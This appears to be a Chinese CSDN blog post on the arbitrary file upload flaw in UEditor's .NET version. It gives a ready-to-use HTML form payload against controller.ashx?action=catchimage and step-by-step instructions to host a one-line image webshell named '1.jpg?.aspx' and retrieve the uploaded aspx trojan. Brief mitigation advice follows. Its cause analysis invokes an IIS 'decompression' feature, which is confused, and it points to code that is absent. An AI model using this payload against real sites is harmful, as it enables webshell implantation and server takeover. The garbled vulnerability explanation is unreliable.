UEditor .net版本任意文件上传

最新推荐文章于 2024-04-12 14:45:00 发布
最新推荐文章于 2024-04-12 14:45:00 发布
阅读量898 收藏 3
点赞数
分类专栏: 漏洞分析 文件上传 UEditor .net版本任意文件上传
By Azjj 转发请注明
本文链接:https://blog.csdn.net/weixin_44578334/article/details/109953633
版权

UEditor .net版本任意文件上传

简介

ueditor是百度官方技术团队开发的一套前端编辑器,可以上传图片,写文字,支持自定义的html编写,移动端以及电脑端都可以无缝对接,自适应页面,图片也可以自动适应当前的上传路径与页面比例大小,一些视频文件的上传,开源,高效,稳定,安全,一直深受站长们的喜欢。

百度的UEditor文本编辑器,近几年很少被曝出漏洞,事情没有绝对的,总会有漏洞,这次被曝出的漏洞是.net版本的,其他的php,jsp,asp版本不受此UEditor的漏洞的影响,.net存在任意文件上传,绕过文件格式的限制,在获取远程资源的时候并没有对远程文件的格式进行严格的过滤与判断,攻击者可以上传任意文件包括脚本执行文件,包括aspx脚本木马,asp脚本木马,还可以利用该UEditor漏洞对服务器进行攻击,执行系统命名破坏服务器,由于漏洞危害严重性较高,受害网站较多

漏洞payload

<form action="http://www/ueditor/net/controller.ashx?action=catchimage&encode=utf-8" enctype="application/x-www-form-urlencoded" method="POST">
<p>shell addr:<input type="text" name="source[]" /></p >
<input type="submit" value="Submit" />
</form>

将他保存为Html文件

然后我们打开html看到,需要一个远程链接的文件,这里我们可以找一个图片脚本木马,最好是一句话图片小马,把该小马文件上传到我们的网站服务器里,把文件名改为1.jpg?.aspx,然后复制网站链接到构造的html中去,如下图:

 

点击submit,直接上传成功,并返回我们的aspx脚本木马路径地址,我们打开就可以使用了。

 

 

UEdito漏洞分析

那么UEdito漏洞到底是如何产生的呢?最主要的还是利用了IIS的目录解压功能,在解压的同时会去访问控制器文件,包括controller.aspx文件,当上传到网站里的时候,会自动解压并调用一些特殊应用的目录地址,有些目录都可以被远程的调用,我们看下面的代码:

漏洞修复

1.目前临时的漏洞修复是建议,把文件上传目录设置无脚本执行权限,uploadvideo、uploadimage、catchimage、uploadscrawl、uploadfile、等等目录都设置上无脚本权限。

2.在百度UEditor官方没有出补丁前,设置图片目录为只读,禁止写入。

3.修改程序的源代码,对crawlerhandler源文件进行文件上传格式的严格过滤与判断。

 

Azjj98
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
百度编辑器UEditor .NET版 v1.4.3.2
10-28
Ueditor是由百度web前端研发部开发所见即所得的编辑器,具有轻量,可定制,注重用户体验等特点。Ueditor基于BSD开源协议,除了具有代码精简、加载迅速的轻量级特质外,还采用了分层理念,使开发者可以根据实际应用和需求自由定制。Ueditor编辑器划分为了三层架构。其中,核心层为开发者提供了诸如range、selection、domUtils类的底层API接口,中间的命令插件层不仅提供了大量的基础command,还允许开发者基于核心层进行command命令的开发,而面向用户端的界面层则可以提供自由定制的用户交互界面。Ueditor开源编辑器这种拥有可配性的模式,令开发者能够根据自身需要接入任何一层进行开发。  百度编辑器 v1.4.3.2 更新日志:更新 video-js 以修复 XSS 安全漏洞
ueditor .net 配置
01-20
百度ueditor .net 基本配置好的
实战纪实 | 编辑器漏洞之Ueditor-任意文件上传漏洞 (老洞新谈)
最新发布
zkaqlaoniao的博客
04-12 2488
前段时间在做某政府单位的项目的时候发现存在该漏洞,虽然是一个老洞,但这也是容易被忽视,且能快速拿到shell的漏洞,在利用方式上有一些不一样的心得,希望能帮助到一些还不太了解的小伙伴,故此写了此篇文章。Ueditor百度开发的一个网站编辑器,目前已经不对其进行后续开发和更新,该漏洞只存在于该编辑器的.net版本。其他的php,jsp,asp版本不受此UEditor的漏洞的影响,.net存在任意文件上传,绕过文件格式的限制,在获取远程资源的时候并没有对远程文件的格式进行严格的过滤与判断。
ueditor1-4-3最新.net版本
10-09
ueditor1-4-3.net官网最新版本
ueditor独立文件上传 .net示例
08-09
ueditor独立图片上传 .net上传图片 ueditor上传图片配置 经本人修改测试已经通过 如果要修改适合你的项目 你可能需要修改common/config.json 下面的路径配置
UEditor(.net版本)
07-13
Ueditor文本编辑器 .Net 版,支持 Access,SQL Server数据库。数据库类型可在web.config中设置,数据库链接在DataBaseHepler中设置
UEditor v1.4.3.3 .net版本任意文件上传 漏洞复现
Boom!脑洞大爆炸的博客
07-07 5187
UEditor v1.4.3.3 .net版本任意文件上传 漏洞复现
Ueditor编辑器 .Net
qq_34560417的博客
08-10 4322
1.去Ueditor官网下载 .Net版的 Ueditor包,选择UTf-8版本的 2,解压缩之后,在项目文件中找一个位置新建一个Ueditor文件夹,把解压缩之后的Ueditor包下所有的文件复制到项目新建文件文件夹下边。 3、打开管理NuGET程序包,安装Newtonsoft.Json程序包 4、更改ueditor.config.js中的serverUrl 5、将 .N...
Ueditor .net版安装配置打开项目的源代码傻瓜版教程 亲测~
u012997454的专栏
08-10 2870
环境要求: 没有 .NET Framework 4.0的要先安装 安装完 .NET Framework 4.0 后,还需要向 IIS 注册应用程序池,注册的方法是,使用管理员权限打开命令提示符(CMD),输入以下命令: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis -i 安装完毕后,在 IIS 管理器刷新
UEditor .Net版本任意文件上传漏洞
Jietewang的博客
07-18 2047
目录 前言 漏洞利用 前言 最近接到以前老客户的刷脸需求进行一次测试,挖到了一个漏洞,借机更新一下博客吧。UEditor是一款所见即所得的开源富文本编辑器,具有轻量、可定制、用户体验优秀等特点,被广大WEB应用程序所使用。本次爆出的高危漏洞属于.NET版本,其它的版本暂时不受影响。漏洞成因是在抓取远程数据源的时候未对文件后缀名做验证导致任意文件写入漏洞,攻击者利用此漏洞可以在服务器上执行任意指令。 漏洞利用 隐患url: http://XXX.XXX.XXX.XXX:1111...
UEditor .Net版本任意文件上传漏洞复现总结
weixin_50464560的博客
04-18 3104
UEditor .Net版本任意文件上传漏洞复现总结 - 知乎 (zhihu.com) 这个洞有一定年数了,是2018年发现的(从下图的shodan中可以得知,该漏洞已经被大部分黑客SEO利用),最近看到一个表哥研究这个洞,就顺便拿来复现分析了一波。 一、漏洞介绍 Ueditor百度开发的一个网站编辑器,目前已经不对其进行后续开发和更新,该漏洞只存在于该编辑器的.net版本。 漏洞的成因是在获取图片资源时仅检查了ContentType,导致可以绕过达到任意文件上传。 Crawler方法对
百度编辑器UEditor UTF-8 .NET版 v1.4.3.2
12-07
Ueditor是由百度web前端研发部开发所见即所得的编辑器,具有轻量,可定制,注重用户体验等特点。Ueditor基于BSD开源协议,除了具有代码精简、加载迅速的轻量级特质外,还采用了分层理念,使开发者可以根据实际应用和需求自由定制。 Ueditor编辑器划分为了三
UEditor 百度文本编辑器 .Net实例 已解决上传图片问题
12-19
1、UEditor 百度文本编辑器完整版 .Net实例 已解决上传图片问题。 2、内附完整demo实例,附带txt讲解说明及UEditor常见问题解决方案。 3、已经调试好的百度文本编辑器实例,用户体验不错,具备很多人性化的功能,特推荐给大家!
UEditor4DotNET.rar
05-20
UEditor在线编辑器,用起来好挺好的。 这个编辑器支持php、java、.net,方便好用。 我这个分享的是.net版本的,希望大家喜欢。
百度编辑器UEditor .NET版源代码
03-18
Ueditor是由百度web前端研发部开发所见即所得的编辑器,具有轻量,可定制,注重用户体验等特点。Ueditor基于BSD开源协议,除了具有代码精简、加载迅速的轻量级特质外,还采用了分层理念,使开发者可以根据实际应用和...
百度编辑器UEditor .NET版 v1.4.3
04-03
Ueditor是由百度web前端研发部开发所见即所得的编辑器,具有轻量,可定制,注重用户体验等特点。Ueditor基于BSD开源协议,除了具有代码精简、加载迅速的轻量级特质外,还采用了分层理念,使开发者可以根据实际应用和...
UEditor .Net版本任意文件上传漏洞复现
m0_37638874的博客
06-08 2999
  漏洞背景   漏洞影响   漏洞利用   漏洞分析漏洞背景漏洞影响漏洞利用首先准备一个html文件用来做post提交 action处填写网站的路径 另外:enctype="application/x-www-form-urlencoded"什么意思?打开html后如下 这个时候我们需要一台服务器用来放图片木马,服务器可以去阿里云、华为云等申请免费的我们准备一张的图片跟一个小马,小马代码如下 用命令合成图片木马 我们把此木马上传到我们的服务器,记住服务器图片路径在之前的里填写如下参数 是我们服务器的地址后
百度ueditor - 支持word上传的富文本编辑器
yjjatqihc的博客
11-25 949
1.4.2之后官方并没有做功能的改动,1.4.2在word复制这块没有bug,其他版本会出现手动无法转存的情况 本文使用的后台是Java。前端为Jsp(前端都一样,后台如果语言不通得自己做 Base64编码解码) 因为公司业务需要支持IE8 ,网上其实有很多富文本框,效果都很好。 例如www.wangEditor.com 但试了一圈都不支持IE8 。 所以回到Ueditor,由于官方没有维护,新的neuditor 也不知道什么时候能支持word自动转存,只能自己想办法。 如果没有必要,不建议使用.
springboot整合百度文本编辑器ueditor实现图片上传和文件上传以及回显
靠谱杨踩坑日记
06-16 307
springboot整合ueditor实现图片上传和文件上传功能 写在前面: 在阅读本篇之前,请先按照我的这篇随笔完成对ueditor的前期配置工作: springboot+layui 整合百度文本编辑器ueditor入门使用教程(踩过的坑)https://www.cnblogs.com/rainbow-1/p/16365016.html maven导入需要的几个jar包:https://ww...
ueditor .net 1.3.6 上传文件图片报500
12-22
ueditor .net 1.3.6 是一个用于上传文件和图片的插件,当出现上传文件图片报500的情况时,通常是由于服务器端出现了错误。这种情况可能是由于服务器配置问题、权限问题或者代码问题导致的。 首先,可以尝试检查服务器端的配置是否正确,确保上传文件的大小和类型不超出服务器的限制,并且确保有足够的空间可以存储上传的文件和图片。 其次,需要检查文件和图片上传的路径是否设置正确,确保程序可以正确找到并存储上传的文件。 另外,还需要检查代码是否正确,尤其是在进行文件上传时的代码逻辑是否有误,可能是由于程序逻辑错误导致的上传失败。 在排查以上可能原因后,如果问题依然存在,可以尝试查看服务器端的日志,以获取更详细的错误信息,这样能够更好地定位和解决问题。 总之,上传文件图片报500的问题通常是由于服务器端配置、路径设置或代码逻辑等方面的错误导致的,需要仔细排查并逐一解决。希望以上建议可以帮助解决这个问题。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Azjj98

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值